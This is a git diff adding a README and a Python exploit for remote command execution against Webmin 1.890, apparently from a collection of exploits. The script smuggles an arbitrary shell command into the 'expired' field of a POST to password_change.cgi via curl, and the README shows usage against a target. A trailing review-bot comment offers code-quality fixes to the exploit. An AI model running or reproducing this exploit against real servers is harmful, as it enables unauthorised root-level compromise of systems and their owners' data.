diff --git a/CMS/Webmin/README.md b/CMS/Webmin/README.md
new file mode 100644
index 0000000..a31e5e9
--- /dev/null
+++ b/CMS/Webmin/README.md
@@ -0,0 +1,11 @@
+# Webmin 1.890 RCE
+
+## 供应链攻击的典型案例,值得收录
+
+### exp 使用
+```shell
+python3 exploit.py http://10.0.0.1:10000 id
+```
+
+服务器返回结果如下:
+![](images/服务器返回内容.png)
\ No newline at end of file
diff --git a/CMS/Webmin/exploit.py b/CMS/Webmin/exploit.py
new file mode 100644
index 0000000..5e2df5d
--- /dev/null
+++ b/CMS/Webmin/exploit.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python3
+import os
+import sys
+
+
+STAIN = """
+WebMin 1.890-expired-remote-root
+"""
+usage = """Usage: python3 exploit.py target COMMAND
+
+Ex: python3 exploit.py http://10.0.0.1:10000 id
+
+"""
+
+def exploit(target, url, command):
+ header = 'Referer: {}/session_login.cgi'.format(target)
+ payload = 'user=gotroot&pam=&expired=2|echo "";{}'.format(command)
+ os.system("curl -k {} -d '{}' -H '{}'".format(url,payload,header))
+
+
+if __name__ == '__main__':
+ try:
+ print(STAIN)
+ target = sys.argv[1].rstrip("/")
+ url = target+"/password_change.cgi"
+ command = sys.argv[2]
+ exploit(target, url, command)
+ except:
+ print(STAIN)
+ print(usage)
diff --git a/CMS/Webmin/images/服务器返回内容.png b/CMS/Webmin/images/服务器返回内容.png
new file mode 100644
index 0000000..965bf80
Binary files /dev/null and b/CMS/Webmin/images/服务器返回内容.png differ
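Review bot: The bare `except:` around the whole `__main__` block in exploit.py turns every failure into the usage text, so a missing argument, a Ctrl-C and an error raised inside `exploit()` are indistinguishable, and the banner is printed a second time. Catching only the missing-argument case, `except IndexError:`, and dropping the second `print(STAIN)` would keep real errors visible. Note also that `os.system` hands the formatted string to the local shell, so quoting in either `sys.argv` value is interpreted on the machine that runs the script before curl is started. The file has no module docstring; a single line saying that it sends one POST to `<target>/password_change.cgi` through curl with certificate checks disabled (`-k`) and prints the response would tell a reader what traffic to expect.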